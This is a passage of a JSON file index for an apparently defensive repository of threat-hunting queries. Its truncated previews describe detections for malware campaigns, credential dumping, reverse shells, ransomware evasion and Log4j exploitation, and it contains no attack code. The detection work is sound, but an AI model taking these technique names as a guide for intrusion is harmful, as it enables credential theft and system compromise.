"path": "Campaigns/Jupyter-Solarmaker/successive-tk-domain-calls.md",
"chars": 1907,
"preview": "# Jupyter AKA SolarMarker\nJupyter, otherwise known as SolarMarker, is a malware family and cluster of components known f"
},
{
"path": "Campaigns/LemonDuck/LemonDuck-competition-killer.md",
"chars": 2212,
"preview": "# LemonDuck competition killer script execution\nLemonDuck is an actively updated and robust malware primarily known for "
},
{
"path": "Campaigns/LemonDuck/LemonDuck-component-download-structure.md",
"chars": 1944,
"preview": "# LemonDuck component download structure\nLemonDuck is an actively updated and robust malware primarily known for its bot"
},
{
"path": "Campaigns/LemonDuck/LemonDuck-component-names.md",
"chars": 1787,
"preview": "# LemonDuck common external component names\nLemonDuck is an actively updated and robust malware primarily known for its "
},
{
"path": "Campaigns/LemonDuck/LemonDuck-control-structure.md",
"chars": 1770,
"preview": "# LemonDuck command-and-control contact structure\nLemonDuck is an actively updated and robust malware primarily known fo"
},
{
"path": "Campaigns/LemonDuck/LemonDuck-defender-exclusions.md",
"chars": 2006,
"preview": "# LemonDuck Microsoft Defender drive exclusion tampering\nLemonDuck is an actively updated and robust malware primarily k"
},
{
"path": "Campaigns/LemonDuck/LemonDuck-email-subjects.md",
"chars": 1935,
"preview": "# LemonDuck Email Subjects\nLemonDuck is an actively updated and robust malware primarily known for its botnet and crypto"
},
{
"path": "Campaigns/LemonDuck/LemonDuck-id-generation.md",
"chars": 1808,
"preview": "# LemonDuck command-and-control ID generation\nLemonDuck is an actively updated and robust malware primarily known for it"
},
{
"path": "Campaigns/LemonDuck/LemonDuck-registration-function.md",
"chars": 1743,
"preview": "# LemonDuck botnet registration functions\nLemonDuck is an actively updated and robust malware primarily known for its bo"
},
{
"path": "Campaigns/Log4J/Alerts related to Log4j vulnerability.md",
"chars": 1788,
"preview": "# Alerts related to Log4j vulnerability\nMicrosoft has observed attackers exploiting vulnerabilities associated with Log4"
},
{
"path": "Campaigns/Log4J/Devices with Log4j vulnerability alerts and additional other alert related context.md",
"chars": 2345,
"preview": "# Devices with Log4j vulnerability alerts and additional other alert related context\nMicrosoft has observed threat actor"
},
{
"path": "Campaigns/Log4J/Suspicious JScript staging comment.md",
"chars": 1347,
"preview": "# Suspicious JScript staging comment\nMicrosoft has observed attackers who have gained entry to an environment via the Lo"
},
{
"path": "Campaigns/Log4J/Suspicious PowerShell curl flags.md",
"chars": 1547,
"preview": "# Suspicious PowerShell curl flags\nMicrosoft has observed attackers who have gained entry to an environment via the Log4"
},
{
"path": "Campaigns/Log4J/Suspicious process event creation from VMWare Horizon TomcatService.md",
"chars": 1446,
"preview": "# Suspicious process event creation from VMWare Horizon TomcatService\nMicrosoft has observed attackers who have gained e"
},
{
"path": "Campaigns/MacOceanLotusBackdoor.txt",
"chars": 364,
"preview": "// Backdoor processes associated with OceanLotus Mac Malware Backdoor\n// References:\n// https://blog.trendmicro.com/t"
},
{
"path": "Campaigns/MacOceanLotusDropper.txt",
"chars": 477,
"preview": "// Backdoor processes associated with OceanLotus Mac malware backdoor dropper\n// References:\n// https://blog.trendmic"
},
{
"path": "Campaigns/Macaw Ransomware/Disable Controlled Folders.md",
"chars": 1335,
"preview": "# Macaw ransomware - Disable Controlled Folders \nPrior to deploying Macaw ransomware in an organization, the adversary w"
},
{
"path": "Campaigns/Macaw Ransomware/Imminent Ransomware.md",
"chars": 3235,
"preview": "# Macaw ransomware - Imminent Ransomware \nDirectly prior to deploying Macaw ransomware in an organization, the attacker "
},
{
"path": "Campaigns/Macaw Ransomware/Inhibit recovery by disabling tools and functionality.md",
"chars": 1536,
"preview": "# Macaw ransomware - Inhibit recovery by disabling tools and functionality \nPrior to deploying Macaw ransomware in an or"
},
{
"path": "Campaigns/Macaw Ransomware/Mass account password change.md",
"chars": 1342,
"preview": "# Macaw ransomware - Mass account password change \nPrior to deploying Macaw ransomware in an organization, adversaries w"
},
{
"path": "Campaigns/Macaw Ransomware/PSExec Attrib commands.md",
"chars": 1352,
"preview": "# Macaw ransomware - PSExec Attrib commands \nPrior to deploying Macaw ransomware in an organization, adversaries wil use"
},
{
"path": "Campaigns/Macaw Ransomware/Use of MSBuild as LOLBin.md",
"chars": 1194,
"preview": "# Macaw Ransomware - Use of MSBuild.exe as a LOLBin\nPrior to deploying Macaw ransomware in an organization, the adversar"
},
{
"path": "Campaigns/OceanLotus registry activity.txt",
"chars": 920,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_oceanlotus_registry.yml\n// Questions "
},
{
"path": "Campaigns/Qakbot/Excel launching anomalous processes.md",
"chars": 1427,
"preview": "# Excel launching anomalous processes\n\n\n## Query\nUse this query to find Excel launching anomalous processes congruent wi"
},
{
"path": "Campaigns/Qakbot/General attempts to access local email store.md",
"chars": 1128,
"preview": "# General attempts to access local email store\n\n\n## Query\nUse this query to find attempts to access files in the local p"
},
{
"path": "Campaigns/Qakbot/Qakbot Craigslist Domains.md",
"chars": 1289,
"preview": "# Qakbot Craigslist Domains\nQakbot operators have been abusing the Craigslist messaging system to send malicious emails."
},
{
"path": "Campaigns/Qakbot/Qakbot email theft.md",
"chars": 1456,
"preview": "# Qakbot email theft\n\n\n## Query\nUse this query to find email stealing activities ran by Qakbot that will use “ping.exe -"
},
{
"path": "Campaigns/Qakbot/Qakbot reconnaissance activities.md",
"chars": 1590,
"preview": "# Qakbot reconnaissance activities\n\n\n## Query\nUse this query to find reconnaissance and beaconing activities after code "
},
{
"path": "Campaigns/Ransomware hits healthcare - Alternate Data Streams use.txt",
"chars": 485,
"preview": "// Find use of Alternate Data Streams (ADS) for anti-forensic purposes.\r\n// Alternate Data Streams execution \r\nDevicePro"
},
{
"path": "Campaigns/Ransomware hits healthcare - Backup deletion.txt",
"chars": 184,
"preview": "// List alerts flagging attempts to delete backup files\r\n AlertInfo \r\n| where Timestamp > ago(7d) \r\n| where Title == \"F"
},
{
"path": "Campaigns/Ransomware hits healthcare - Cipher.exe tool deleting data.txt",
"chars": 506,
"preview": "// Look for cipher.exe deleting data from multiple drives. \r\n// This is often performed as an anti-forensic measure pri"
},
{
"path": "Campaigns/Ransomware hits healthcare - Clearing of system logs.txt",
"chars": 267,
"preview": "// Look for attempts to use fsutil.exe to delete file system logs that can be used as forensic artifacts.\r\nDeviceProces"
},
{
"path": "Campaigns/Ransomware hits healthcare - Possible compromised accounts.txt",
"chars": 1068,
"preview": "// Identify accounts that have logged on to affected endpoints\r\n// Check for specific alerts\r\nAlertInfo \r\n| where Timest"
},
{
"path": "Campaigns/Ransomware hits healthcare - Robbinhood activity.txt",
"chars": 341,
"preview": "// Find distinct evasion and execution activities \r\n// associated with the Robbinhood ransomware campaign.\r\nDeviceProces"
},
{
"path": "Campaigns/Ransomware hits healthcare - Turning off System Restore.txt",
"chars": 558,
"preview": "// Find attempts to stop System Restore and \r\n// prevent the system from creating restore points\r\nDeviceProcessEvents \r"
},
{
"path": "Campaigns/Ransomware hits healthcare - Vulnerable Gigabyte drivers.txt",
"chars": 299,
"preview": "// Locate vulnerable Gigabyte drivers used by RobbinHood ransomware to turn off security tools\r\nDeviceFileEvents \r\n| wh"
},
{
"path": "Campaigns/StrRAT malware/StrRAT-AV-Discovery.md",
"chars": 1580,
"preview": "# StrRAT Malware AV Discovery\nStrRAT is a Java-based remote access tool which steals browser credentials, logs keystroke"
},
{
"path": "Campaigns/StrRAT malware/StrRAT-Email-Delivery.md",
"chars": 1740,
"preview": "# StrRAT Malware Email Delivery \nStrRAT is a Java-based remote access tool which steals browser credentials, logs keystr"
},
{
"path": "Campaigns/StrRAT malware/StrRAT-Malware-Persistence.md",
"chars": 1500,
"preview": "# StrRAT Malware Persistence\nStrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes"
},
{
"path": "Campaigns/Sysrv-botnet/app-armor-stopped.md",
"chars": 1208,
"preview": "# AppArmor service stopped\n\nThis query was originally published in the threat analytics report, *Sysrv botnet evolution*"
},
{
"path": "Campaigns/Sysrv-botnet/java-executing-cmd-to-run-powershell.md",
"chars": 1314,
"preview": "# Java process executing command line to download and execute PowerShell script\n\nThis query was originally published in "
},
{
"path": "Campaigns/Sysrv-botnet/kinsing-miner-download.md",
"chars": 1146,
"preview": "# Kinsing miner download\n\nThis query was originally published in the threat analytics report, *Sysrv botnet evolution*.\n"
},
{
"path": "Campaigns/Sysrv-botnet/oracle-webLogic-executing-powershell.md",
"chars": 1298,
"preview": "# Oracle WebLogic process wlsvcX64.exe exploitation and execution of PowerShell script to download payloads\n\nThis query "
},
{
"path": "Campaigns/Sysrv-botnet/rce-on-vulnerable-server.md",
"chars": 1201,
"preview": "# Remote code execution on vulnerable server\n\nThis query was originally published in the threat analytics report, *Sysrv"
},
{
"path": "Campaigns/Sysrv-botnet/tomcat-8-executing-powershell.md",
"chars": 1444,
"preview": "# Tomcat 8 process executing PowerShell command line to perform data exploitation activities and setting up scheduler ta"
},
{
"path": "Campaigns/Threat actor Phosphorus masquerading as conference organizers.md",
"chars": 2636,
"preview": "# Threat actor Phosphorus masquerading as conference organizers\n\nIdentify prior activity from this campaign using IOCs s"
},
{
"path": "Campaigns/WastedLocker Downloader.md",
"chars": 1243,
"preview": "# WastedLocker Downloader\n\nThis query identifies the launch pattern associated with wastedlocker ransomware.\nReference w"
},
{
"path": "Campaigns/ZLoader/Malicious bat file.md",
"chars": 1227,
"preview": "# Malicious .bat file in suspicious Oracle Java SE folder path\nZLoader was delivered in a campaign in late summer 2021. "
},
{
"path": "Campaigns/ZLoader/Payload Delivery.md",
"chars": 1204,
"preview": "# Tim.exe payload delivery\nZLoader was delivered in a campaign in summer 2021 via malvertising. This campaign was tweete"
},
{
"path": "Campaigns/ZLoader/Suspicious Registry Keys.md",
"chars": 1298,
"preview": "# Suspicious Registry Keys\nZLoader was delivered in a campaign in late summer 2021 using malvertising to download malici"
},
{
"path": "Campaigns/apt sofacy zebrocy.txt",
"chars": 292,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_sofacy_zebrocy.yml\n// Questions via T"
},
{
"path": "Campaigns/apt sofacy.txt",
"chars": 369,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_sofacy.yml\n// Questions via Twitter: "
},
{
"path": "Campaigns/apt ta17 293a ps.txt",
"chars": 272,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_ta17_293a_ps.yml\n// Questions via Twi"
},
{
"path": "Campaigns/apt tropictrooper.txt",
"chars": 308,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_tropictrooper.yml\n// Questions via Tw"
},
{
"path": "Campaigns/apt unidentified nov 18.txt",
"chars": 409,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_unidentified_nov_18.yml\n// Questions "
},
{
"path": "Campaigns/c2-lookup-from-nonbrowser[Nobelium].md",
"chars": 5518,
"preview": "# Locate Nobelium implant receiving DNS response\n\nThis query was originally published in the threat analytics report, *S"
},
{
"path": "Campaigns/c2-lookup-response[Nobelium].md",
"chars": 5526,
"preview": "# Locate Nobelium implant receiving DNS response\n\nThis query was originally published in the threat analytics report, *S"
},
{
"path": "Campaigns/cobalt-strike-invoked-w-wmi.md",
"chars": 3009,
"preview": "# Detect Cobalt Strike invoked via WMI\n\nThis query was originally published in the threat analytics report, *Ryuk ransom"
},
{
"path": "Campaigns/compromised-certificate[Nobelium].md",
"chars": 4761,
"preview": "# Compromised certificate [Nobelium]\n\nSearch for the files that are using a compromised certificate associated with the "
},
{
"path": "Campaigns/confluence-weblogic-targeted.md",
"chars": 3669,
"preview": "# Confluence and WebLogic servers targeted by campaign\n\nThis query was originally published in the threat analytics repo"
},
{
"path": "Campaigns/cypherpunk-exclusive-commands.md",
"chars": 1405,
"preview": "# Cypherpunk remote execution through PSEXESVC\n\nThis query was originally published in the threat analytics report, *Cyp"
},
{
"path": "Campaigns/cypherpunk-remote-exec-w-psexesvc.md",
"chars": 1712,
"preview": "# Cypherpunk remote execution through PSEXESVC\n\nThis query was originally published in the threat analytics report, *Cyp"
},
{
"path": "Campaigns/detect-cyzfc-activity.md",
"chars": 3005,
"preview": "# Detect activity associated with malicious DLL, cyzfc.dat\n\nThese queries was originally published in the threat analyti"
},
{
"path": "Campaigns/fireeye-red-team-tools-CVEs [Nobelium].md",
"chars": 5983,
"preview": "# FireEye Red Team tool CVEs [Nobelium]\n\nSearch for the CVEs that should be prioritized and resolved to reduce the succe"
},
{
"path": "Campaigns/fireeye-red-team-tools-HASHs [Nobelium].md",
"chars": 19413,
"preview": "# FireEye Red Team tool HASHs [Nobelium]\n\nThis query searches for the HASHs of the FireEye Red Team tools compromised by"
},
{
"path": "Campaigns/known-affected-software-orion[Nobelium].md",
"chars": 5346,
"preview": "# View data on software identified as affected by Nobelium campaign\n\nThis query was originally published in the threat a"
},
{
"path": "Campaigns/launching-base64-powershell[Nobelium].md",
"chars": 5873,
"preview": "# Locate SolarWinds processes launching suspicious PowerShell commands\n\nThis query was originally published in the threa"
},
{
"path": "Campaigns/launching-cmd-echo[Nobelium].md",
"chars": 5600,
"preview": "# Locate SolarWinds processes launching command prompt with the echo command\n\nThis query was originally published in the"
},
{
"path": "Campaigns/locate-dll-created-locally[Nobelium].md",
"chars": 7055,
"preview": "# Locate Nobelium-related malicious DLLs created in the system or locally\n\nThis query was originally published in the th"
},
{
"path": "Campaigns/locate-dll-loaded-in-memory[Nobelium].md",
"chars": 7059,
"preview": "# Locate Nobelium-related malicious DLLs loaded in memory\n\nThis query was originally published in the threat analytics r"
},
{
"path": "Campaigns/oceanlotus-apt32-files.md",
"chars": 5225,
"preview": "# Detect malicious documents associated with group known as \"OceanLotus\"\n\nThis query was originally published in a threa"
},
{
"path": "Campaigns/oceanlotus-apt32-network.md",
"chars": 1790,
"preview": "# Detect malicious network activity associated with group known as \"OceanLotus\"\n\nThis query was originally published in "
},
{
"path": "Campaigns/possible-affected-software-orion[Nobelium].md",
"chars": 5502,
"preview": "# Get an inventory of SolarWinds Orion software possibly affected by Nobelium\n\nThis query was originally published in th"
},
{
"path": "Campaigns/robbinhood-driver.md",
"chars": 2228,
"preview": "# Detect loading of vulnerable drivers by Robbinhood ransomware campaign\n\nThis query was originally published in the thr"
},
{
"path": "Campaigns/robbinhood-evasion.md",
"chars": 2225,
"preview": "# Detect security evasion related to the Robbinhood ransomware campaign\n\nThis query was originally published in the thre"
},
{
"path": "Campaigns/snip3-aviation-targeting-emails.md",
"chars": 2142,
"preview": "# Detect keywords associated with Snip3 campaign emails\n\nSnip3 is a family of related remote access trojans. Although th"
},
{
"path": "Campaigns/snip3-detectsanboxie-function-call.md",
"chars": 1664,
"preview": "# Detect Snip3 loader call to DetectSandboxie function\n\nSnip3 is a family of related remote access trojans. Although the"
},
{
"path": "Campaigns/snip3-encoded-powershell-structure.md",
"chars": 1709,
"preview": "# Detect Snip3 loader-encoded PowerShell command\n\nSnip3 is a family of related remote access trojans. Although the malwa"
},
{
"path": "Campaigns/snip3-malicious-network-connectivity.md",
"chars": 1724,
"preview": "# Detect malicious use of RegAsm, RegSvcs, and InstallUtil by Snip3\n\nSnip3 is a family of related remote access trojans."
},
{
"path": "Campaigns/snip3-revengerat-c2-exfiltration.md",
"chars": 1636,
"preview": "# Detect Snip3 associated communication protocols\n\nSnip3 is a family of related remote access trojans. Although the malw"
},
{
"path": "Collection/Anomaly of MailItemAccess by Other Users Mailbox [Nobelium].md",
"chars": 7241,
"preview": "# Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]\n\nThis query looks for users accessing multiple ot"
},
{
"path": "Collection/HostExportingMailboxAndRemovingExport[Solarigate].md",
"chars": 2596,
"preview": "# Host Exporting Mailbox and Removing Export\nThis hunting query looks for hosts exporting a mailbox from an on-prem Exc"
},
{
"path": "Collection/MailItemsAccessedTimeSeries[Solarigate].md",
"chars": 3434,
"preview": "# Host Exporting Mailbox and Removing Export\nIdentifies anomalous increases in Exchange mail items accessed operations."
},
{
"path": "Command and Control/C2-NamedPipe.md",
"chars": 6757,
"preview": "# Detects malicious SMB Named Pipes (used by common C2 frameworks)\n\nDetects the creation of a [named pipe](https://docs."
},
{
"path": "Command and Control/Connection to Rare DNS Hosts.md",
"chars": 2434,
"preview": "# Connection to Rare DNS Hosts\n\nThis query will break down hostnames into their second and third level domain parts and "
},
{
"path": "Command and Control/DNSPattern [Nobelium].md",
"chars": 6864,
"preview": "# Nobelium campaign DNS pattern\n\nThis query looks for the DGA pattern of the domain associated with the Nobelium campaig"
},
{
"path": "Command and Control/Device network events w low count FQDN.txt",
"chars": 1140,
"preview": "////////////////////////////////////////////////////////////////////////////////////\n// Device Network Events Involving "
},
{
"path": "Command and Control/EncodedDomainURL [Nobelium].md",
"chars": 7648,
"preview": "# Nobelium encoded domain in URL\n\nLooks for a logon domain in the Azure AD logs, encoded with the same DGA encoding use"
},
{
"path": "Command and Control/Tor.txt",
"chars": 959,
"preview": "// This query looks for Tor client, or for a common Tor plugin called Meek.\n// We query for active Tor connections, but "
},
{
"path": "Command and Control/c2-bluekeep.md",
"chars": 2800,
"preview": "# Detect command-and-control communication related to BlueKeep cryptomining\n\nThis query was originally published in the "
},
{
"path": "Command and Control/check-for-shadowhammer-activity-download-domain.md",
"chars": 1611,
"preview": "# Check for ShadowHammer-related download activity\n\nThis query was originally published in the threat analytics report, "
},
{
"path": "Command and Control/python-use-by-ransomware-macos.md",
"chars": 1864,
"preview": "# Python usage associated with ransomware on macOS\n\nThis query was originally published in the threat analytics report, "
},
{
"path": "Command and Control/recon-with-rundll.md",
"chars": 2179,
"preview": "# Detect rundll.exe being used for reconnaissance and command-and-control\n\nThis query was originally published in the th"
},
{
"path": "Command and Control/reverse-shell-ransomware-macos.md",
"chars": 1789,
"preview": "# Reverse shell associated with ransomware on macOS\n\nThis query was originally published in the threat analytics report,"
},
{
"path": "Credential Access/Active Directory Sensitive Group Modifications.md",
"chars": 3573,
"preview": "# Active Directory Sensitive/Tier 0 Group Modifications\nThis query shows all modifications to highly sensitive active di"
},
{
"path": "Credential Access/Private Key Files.txt",
"chars": 1048,
"preview": "/////////////////////////////////////////////////////////\n// Private Key Files\n//\n// This query identifies file operatio"
},
{
"path": "Credential Access/cobalt-strike.md",
"chars": 3433,
"preview": "# Find user accounts potentially affected by Cobalt Strike\n\nThis query was originally published in the threat analytics "
},
{
"path": "Credential Access/doppelpaymer-procdump.md",
"chars": 2756,
"preview": "# Detect DoppelPaymer operators dumping credentials with ProcDump\n\nThis query was originally published in the threat ana"
},
{
"path": "Credential Access/identify-accounts-logged-on-to-endpoints-affected-by-cobalt-strike.md",
"chars": 2903,
"preview": "\n# Identify accounts that have logged on to endpoints affected by Cobalt Strike\n\nThis query was originally published in "
},
{
"path": "Credential Access/lazagne.md",
"chars": 2499,
"preview": "# Detect credential theft via SAM database export by LaZagne\n\nThis query was originally published in the threat analytic"
},
{
"path": "Credential Access/logon-attempts-after-malicious-email.md",
"chars": 1581,
"preview": "\n# Logon attempts after receipt of malicious email\n\nThis query finds the 10 latest logons performed by email recipients "
},
{
"path": "Credential Access/procdump-lsass-credentials.md",
"chars": 3105,
"preview": "# Procdump dumping LSASS credentials\n\nThis query was originally published in the threat analytics report, \"Exchange Serv"
},
{
"path": "Credential Access/wadhrama-credential-dump.md",
"chars": 1972,
"preview": "# Image File Execution Options and .bat file usage in association with Wadhrama ransomware\n\nThis query was originally pu"
},
{
"path": "Credential Access/wdigest-caching.md",
"chars": 2530,
"preview": "# Credential harvesting through WDigest cache\n\nThis query was originally published in the threat analytics report, *WDig"
},
{
"path": "Defense evasion/ADFSDomainTrustMods[Nobelium].md",
"chars": 6707,
"preview": "# Domain federation trust settings modified\n\nThis query will find when federation trust settings are changed for a domai"
},
{
"path": "Defense evasion/Discovering potentially tampered devices [Nobelium].md",
"chars": 6429,
"preview": "# Discovering potentially tampered devices [Nobelium]\n\nTo evade security software and analyst tools, Nobelium malware en"
},
{
"path": "Defense evasion/MailPermissionsAddedToApplication[Nobelium].md",
"chars": 6665,
"preview": "# Mail.Read or Mail.ReadWrite permissions added to OAuth application\n\nThis query will find applications that have been g"
},
{
"path": "Defense evasion/PotentialMicrosoftDefenderTampering[Solarigate].md",
"chars": 3260,
"preview": "# Potential Microsoft Defender services tampering\nIdentifies potential service tampering related to Microsoft Defender "
},
{
"path": "Defense evasion/UpdateStsRefreshToken[Solorigate].md",
"chars": 2532,
"preview": "# Security Token Service (STS) refresh token modifications\nThis will show Active Directory Security Token Service (STS) "
},
{
"path": "Defense evasion/alt-data-streams.md",
"chars": 2253,
"preview": "# Detect use of Alternate Data Streams\n\nThis query was originally published in the threat analytics report, *Ransomware "
},
{
"path": "Defense evasion/clear-system-logs.md",
"chars": 1833,
"preview": "# Detect clearing of system logs\n\nThis query was originally published in the threat analytics report, *Ransomware contin"
},
{
"path": "Defense evasion/deleting-data-w-cipher-tool.md",
"chars": 2054,
"preview": "# Detect cipher.exe deleting data\n\nThis query was originally published in the threat analytics report, *Ransomware conti"
},
{
"path": "Defense evasion/doppelpaymer-stop-services.md",
"chars": 2326,
"preview": "# Detect DoppelPaymer operators stopping services\n\nThis query was originally published in the threat analytics report, *"
},
{
"path": "Defense evasion/hiding-java-class-file.md",
"chars": 1700,
"preview": "# Hiding a Java class file\n\nThis query was originally published in the threat analytics report, *Adwind utilizes Java fo"
},
{
"path": "Defense evasion/locate-files-possibly-signed-by-fraudulent-ecc-certificates.md",
"chars": 2070,
"preview": "# Locate files possibly signed by fraudulent ECC certificates\n\nThis query was originally published in the threat analyti"
},
{
"path": "Defense evasion/qakbot-campaign-process-injection.md",
"chars": 2195,
"preview": "# Process injection by Qakbot malware\n\nThis query was originally published in the threat analytics report, *Qakbot bligh"
},
{
"path": "Defense evasion/qakbot-campaign-self-deletion.md",
"chars": 2294,
"preview": "# Self-deletion by Qakbot malware\n\nThis query was originally published in the threat analytics report, *Qakbot blight li"
},
{
"path": "Delivery/Doc attachment with link to download.txt",
"chars": 3634,
"preview": "// This query looks for a Word document attachment, from which a link was clicked, and after which there was a browser d"
},
{
"path": "Delivery/Dropbox downloads linked from other site.txt",
"chars": 732,
"preview": "// This query looks for user content downloads from dropbox that originate from a link/redirect from a 3rd party site.\n/"
},
{
"path": "Delivery/Email link + download + SmartScreen warning.txt",
"chars": 2388,
"preview": "// Look for links opened from outlook.exe, followed by a browser download and then a SmartScreen app warning that was ig"
},
{
"path": "Delivery/Gootkit-malware.md",
"chars": 1907,
"preview": "# Gootkit malware delivery and C2\n\nThis query was originally published on Twitter, by [@MsftSecIntel](https://twitter.co"
},
{
"path": "Delivery/Open email link.txt",
"chars": 5494,
"preview": "// Query for links opened from mail apps – if a detection occurred right afterwards.\n// As there are many links opened f"
},
{
"path": "Delivery/Pivot from detections to related downloads.txt",
"chars": 2348,
"preview": "// Pivot from downloads detected by Windows Defender Antivirus to other files downloaded from the same sites\n// To learn"
},
{
"path": "Delivery/Qakbot Craigslist Domains.md",
"chars": 1289,
"preview": "# Qakbot Craigslist Domains\nQakbot operators have been abusing the Craigslist messaging system to send malicious emails."
},
{
"path": "Delivery/detect-jscript-file-creation.md",
"chars": 1757,
"preview": "# Detect .jse file creation events\n\nThis query was originally published in the threat analytics report, *Emulation-evadi"
},
{
"path": "Delivery/powercat-download.md",
"chars": 2983,
"preview": "# Powercat exploitation tool downloaded\n\nThis query was originally published in the threat analytics report, \"Exchange S"
},
{
"path": "Discovery/Detect-Not-Active-AD-User-Accounts.md",
"chars": 1339,
"preview": "\n# Detect not active AD user accounts \n\n// Detect Active Directory service accounts that are not active because their la"
},
{
"path": "Discovery/DetectTorRelayConnectivity.md",
"chars": 1885,
"preview": "# Detect Tor Relay Connectivity\nThis advanced hunting query detects processes communicating with known Tor relay IP addr"
},
{
"path": "Discovery/DetectTorrentUse.txt",
"chars": 495,
"preview": "//Custom detection to find use of torrenting software or browsing related to torrents\nDeviceNetworkEvents \n| where Times"
},
{
"path": "Discovery/Discover hosts doing possible network scans.txt",
"chars": 761,
"preview": "// Looking for high volume queries against a given RemoteIP, per DeviceName, RemotePort and Process\n// Please change the"
},
{
"path": "Discovery/Enumeration of users & groups for lateral movement.txt",
"chars": 656,
"preview": "// The query finds attempts to list users or groups using Net commands\r\nDeviceProcessEvents \r\n| where Timestamp > ago(14"
},
{
"path": "Discovery/MultipleLdaps.md",
"chars": 1622,
"preview": "# Detect multiple LDAP queries\r\n\r\nDetect multiple Active Directory LDAP queries made in bin time\r\n\r\nReplace 10 on line 1"
},
{
"path": "Discovery/MultipleSensitiveLdaps.md",
"chars": 2717,
"preview": "# Detect multiple sensitive LDAP queries\r\n\r\nDetect multiple sensitive Active Directory LDAP queries made in bin time\r\n\r\n"
},
{
"path": "Discovery/PasswordSearch.md",
"chars": 1905,
"preview": "# Detect LDAP queries that search for user password in description or comment\r\n\r\nDetect Active Directory LDAP queries th"
},
{
"path": "Discovery/PrevalentInteractiveLogons",
"chars": 553,
"preview": "// Breaks down the top interactive logged on user for each machine.\n// you can look for a specific user by using the lin"
},
{
"path": "Discovery/Roasting.md",
"chars": 2765,
"preview": "# Detect LDAP queries that search for accounts vulnerable for roasting attacks\r\n\r\nDetect Active Directory LDAP queries t"
},
{
"path": "Discovery/SMB shares discovery.txt",
"chars": 1030,
"preview": "// Query for processes that accessed more than 10 IP addresses over port 445 (SMB) - possibly scanning for network share"
},
{
"path": "Discovery/SensitiveLdaps.md",
"chars": 1672,
"preview": "# Detect LDAP queries for sensitive objects\r\n\r\nDetect Active Directory LDAP queries that search for sensitive objects in"
},
{
"path": "Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md",
"chars": 6489,
"preview": "# Suspicious enumeration using Adfind tool\n\nAttackers can use Adfind which is administrative tool to gather information "
},
{
"path": "Discovery/URL Detection.txt",
"chars": 621,
"preview": "// This query finds network communication to specific URL\n// Please note that in line #7 it filters RemoteUrl using has "
},
{
"path": "Discovery/VulnComputers.md",
"chars": 1814,
"preview": "# Detect LDAP queries that search for computer operating system\r\n\r\nDetect Active Directory LDAP queries that try to find"
},
{
"path": "Discovery/detect-nbtscan-activity.md",
"chars": 2083,
"preview": "# Detect nbtscan activity\n\nThis query was originally published in the threat analytics report, *Operation Soft Cell*.\n\n["
},
{
"path": "Discovery/detect-suspicious-commands-initiated-by-web-server-processes.md",
"chars": 2647,
"preview": "# Detect suspicious commands initiated by web server processes\n\nThis query was originally published in the threat analyt"
},
{
"path": "Discovery/doppelpaymer.md",
"chars": 2658,
"preview": "# Detect DoppelPaymer performing reconnaissance with net.exe\n\nThis query was originally published in the threat analytic"
},
{
"path": "Discovery/qakbot-campaign-esentutl.md",
"chars": 2227,
"preview": "# Browser cookie theft by campaigns using Qakbot malware\n\nThis query was originally published in the threat analytics re"
},
{
"path": "Discovery/qakbot-campaign-outlook.md",
"chars": 2154,
"preview": "# Outlook email access by campaigns using Qakbot malware\n\nThis query was originally published in the threat analytics re"
},
{
"path": "Email Queries/Appspot Phishing Abuse.md",
"chars": 1994,
"preview": "# Appspot Phishing Abuse\nThis query helps surface phishing campaigns associated with Appspot abuse. These emails frequen"
},
{
"path": "Email Queries/JNLP-File-Attachment.md",
"chars": 1023,
"preview": "## JNLP File Attachments\nJNLP file extensions are an uncommon file type often used to deliver malware. \n\n## Query\nThis q"
},
{
"path": "Email Queries/PhishingEmailUrlRedirector.md",
"chars": 1878,
"preview": "# Phishing email URL redirection\n\nThis query was originally published on Twitter, by [@MsftSecIntel](https://twitter.com"
},
{
"path": "Email Queries/referral-phish-emails.md",
"chars": 2182,
"preview": "# Referral infrastructure credential phishing emails\nThe \"Referral\" infrastructure is a point-in-time set of infrastruct"
},
{
"path": "Execution/Base64 Detector and Decoder.md",
"chars": 1366,
"preview": "# Base64 Detector and Decoder\n\nThis query will identify strings in process command lines which match Base64 encoding for"
},
{
"path": "Execution/Base64encodePEFile.txt",
"chars": 236,
"preview": "// Finding base64 encoded PE files header seen in the command line parameters\n// Tags: #fileLess #powershell\nDeviceProc"
},
{
"path": "Execution/Detect Encoded Powershell.md",
"chars": 1377,
"preview": "# Detect Encoded PowerShell\n\nThis query will detect encoded powershell based on the parameters passed during process cre"
},
{
"path": "Execution/Detect PowerShell v2 Downgrade.md",
"chars": 1667,
"preview": "# Detect PowerShell Downgrade\nThis query looks for processes that load an older version of the system.management.automat"
},
{
"path": "Execution/ExecuteBase64DecodedPayload.txt",
"chars": 806,
"preview": "// Process executed from binary hidden in Base64 encoded file. Encoding malicious software is a \n// technique to obfusc"
},
{
"path": "Execution/File Copy and Execution.md",
"chars": 1993,
"preview": "# File Copy and Execution\nThis query identifies files that are copied to a device over SMB, then executed within a\nspeci"
},
{
"path": "Execution/Malware_In_recyclebin.txt",
"chars": 501,
"preview": "// Finding attackers hiding malware in the recycle bin.\n// Read more here: https://azure.microsoft.com/en-us/blog/how-az"
},
{
"path": "Execution/Masquerading system executable.txt",
"chars": 1603,
"preview": "//Finds legitimate system32 or syswow64 executables being run under a different name and in a different location\r\n//The "
},
{
"path": "Execution/Possible Ransomware Related Destruction Activity.md",
"chars": 2765,
"preview": "# Possible Ransomware Related Destruction Activity\n\nThis query identifies common processes run by ransomware\nmalware to "
},
{
"path": "Execution/PowerShell downloads.txt",
"chars": 657,
"preview": "// Finds PowerShell execution events that could involve a download.\r\nDeviceProcessEvents\r\n| where Timestamp > ago(7d)\r\n|"
},
{
"path": "Execution/PowershellCommand - uncommon commands on machine.txt",
"chars": 2012,
"preview": "// Find which uncommon Powershell Cmdlets were executed on that machine in a certain time period.\n// This covers all Pow"
},
{
"path": "Execution/PowershellCommand footprint.txt",
"chars": 1266,
